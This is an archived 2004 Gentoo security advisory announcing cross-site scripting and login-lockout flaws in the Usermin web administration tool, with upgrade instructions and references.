Gentoo Archives: gentoo-announce

From: Thierry Carrez <koon@g.o>
To: gentoo-announce@l.g.o
Cc: bugtraq@×××××××××××××.com, full-disclosure@××××××××××××.com, security-alerts@×××××××××××××.com
Subject: [gentoo-announce] [ GLSA 200406-15 ] Usermin: Multiple vulnerabilities
Date: Fri, 18 Jun 2004 18:32:31
Message-Id: 40D334FC.4090601@gentoo.org
1 -----BEGIN PGP SIGNED MESSAGE-----
2 Hash: SHA1
3
4 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
5 Gentoo Linux Security Advisory GLSA 200406-15
6 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
7 http://security.gentoo.org/
8 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
9
10 Severity: Normal
11 Title: Usermin: Multiple vulnerabilities
12 Date: June 18, 2004
13 Bugs: #54030
14 ID: 200406-15
15
16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
17
18 Synopsis
19 ========
20
21 Usermin contains two security vulnerabilities which could lead to a
22 Denial of Service attack and information disclosure.
23
24 Background
25 ==========
26
27 Usermin is a web-based administration tool for Unix. It supports a wide
28 range of user applications including configuring mail forwarding,
29 setting up SSH or reading mail.
30
31 Affected packages
32 =================
33
34 -------------------------------------------------------------------
35 Package / Vulnerable / Unaffected
36 -------------------------------------------------------------------
37 1 app-admin/usermin <= 1.070-r1 >= 1.080
38
39 Description
40 ===========
41
42 Usermin contains two security vulnerabilities. One fails to properly
43 sanitize email messages that contain malicious HTML or script code and
44 the other could allow an attacker to lock out a valid user by sending
45 an invalid username and password.
46
47 Impact
48 ======
49
50 By sending a specially crafted e-mail, an attacker can execute
51 arbitrary scripts running in the context of the victim's browser. This
52 can be lead to cookie theft and potentially to compromise of user
53 accounts. Furthermore, an attacker could lock out legitimate users by
54 sending invalid login information.
55
56 Workaround
57 ==========
58
59 There is no known workaround at this time. All users are encouraged to
60 upgrade to the latest available version.
61
62 Resolution
63 ==========
64
65 Usermin users should upgrade to the latest version:
66
67 # emerge sync
68
69 # emerge -pv ">=app-admin/usermin-1.080"
70 # emerge ">=app-admin/usermin-1.080"
71
72 References
73 ==========
74
75 [ 1 ] Bugtraq Announcement
76 http://www.securityfocus.com/bid/10521
77 [ 2 ] SNS Advisory
78
79 http://www.lac.co.jp/security/csl/intelligence/SNSadvisory_e/75_e.html
80
81 Availability
82 ============
83
84 This GLSA and any updates to it are available for viewing at
85 the Gentoo Security Website:
86
87 http://security.gentoo.org/glsa/glsa-200406-15.xml
88
89 Concerns?
90 =========
91
92 Security is a primary focus of Gentoo Linux and ensuring the
93 confidentiality and security of our users machines is of utmost
94 importance to us. Any security concerns should be addressed to
95 security@g.o or alternatively, you may file a bug at
96 http://bugs.gentoo.org.
97
98 License
99 =======
100
101 Copyright 2004 Gentoo Technologies, Inc; referenced text
102 belongs to its owner(s).
103
104 The contents of this document are licensed under the
105 Creative Commons - Attribution / Share Alike license.
106
107 http://creativecommons.org/licenses/by-sa/1.0
108
109 -----BEGIN PGP SIGNATURE-----
110 Version: GnuPG v1.2.4 (GNU/Linux)
111 Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
112
113 iD8DBQFA0zT8vcL1obalX08RAs/oAJ9pWiaefGSPPaQw7zwpw0p4qy2vAQCbBr/T
114 JGv0HPGPWzZ/UxP2A0WhrFE=
115 =K3MM
116 -----END PGP SIGNATURE-----